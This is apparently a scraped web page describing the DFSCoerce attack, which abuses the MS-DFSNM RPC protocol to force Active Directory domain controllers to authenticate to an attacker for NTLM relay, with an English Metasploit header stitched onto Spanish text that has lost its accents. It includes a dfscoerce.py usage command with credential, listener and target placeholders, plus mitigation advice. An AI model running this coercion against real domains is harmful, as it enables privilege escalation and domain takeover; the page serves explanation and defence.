Dfscoerce

[Nickie Koskinen]

Thispage contains detailed information about how to use the auxiliary/scanner/dcerpc/dfscoerce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

En los dominios de Active Directory, los atacantes a menudo se aprovechan de tcnicas forzando (o coaccionando con ingeniera social) la retransmisin de autenticaciones y MitM para para escalar privilegios y moverse lateralmente. En los ltimos tiempos hemos visto como se han abusado de varios protocolos de M$ para conseguirlo: SpoolSample o PrinterBug (MS-RPRN), PetitPotam (MS-EFSRPC) o ShadowCoerce (MS-FSRVP).

Ahora gracias a Filip Dragovic aka Wh04m1001 ampliamos esa lista con el bautizado DFSCoerce que tambin puede derivar en que un atacante tome el control total de un Directorio Activo. Esta vez abusa de MS-DFSNM, protocolo que proporciona la capacidad de operar el sistema de archivos distribuido de Windows (DFS) a travs de una interfaz de llamada a procedimiento remoto (RPC). Concretamente y por el momento, el mtodo usado es NetrDfsRemoveStdRoot que solo funciona contra los controladores de dominio.

Repo:

dfscoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET

Para mitigar el ataque, los investigadores sugieren seguir las anteriores recomendaciones de Microsoft para la mitigacin del ataque de retransmisin NTLM de PetitPotam, como deshabilitar el NTLM en los controladores de dominio y habilitar la Proteccin extendida para la autenticacin (EPA) y las funciones de firma SMB, y desactivar HTTP en los servidores AD CS.

3a8082e126